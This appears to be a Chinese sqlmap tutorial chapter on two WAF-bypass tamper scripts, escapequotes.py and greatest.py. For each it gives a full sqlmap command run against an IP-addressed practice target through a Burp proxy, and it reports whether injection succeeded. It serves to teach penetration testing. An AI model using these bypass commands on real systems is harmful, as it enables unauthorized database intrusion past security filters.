sqlmap从入门到精通-第七章-7-8 绕过WAF脚本-escapequotes.py&greatest.py

16. escapequotes.py脚本

将单引号转换成\', 双引号就转换成\\" ，一般这种情况是用于过滤了单引号或者是双引号的情况下，适用于所有数据库

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="escapequotes.py" --proxy="http://127.0.0.1:8080" -batch

 发现并没有注入成功，尝试看看brup的抓包情况

 发现是针对单引号成功加入了反斜杠

 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

17. greatest.py脚本

使用GREATEST函数替换大于号">" ，比如："1 and bmfx > bmfxx" 替换为"1 and greatest(bmfx,bmfxx+1)=bmfx" 适用于所有数据库

实战演示：

测试地址：python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="greatest.py" --proxy="http://127.0.0.1:8080" -batch

 发现这个绕过参数是可以注入的

看上去并没有在注入的过程中使用，但大意已经表述清楚了。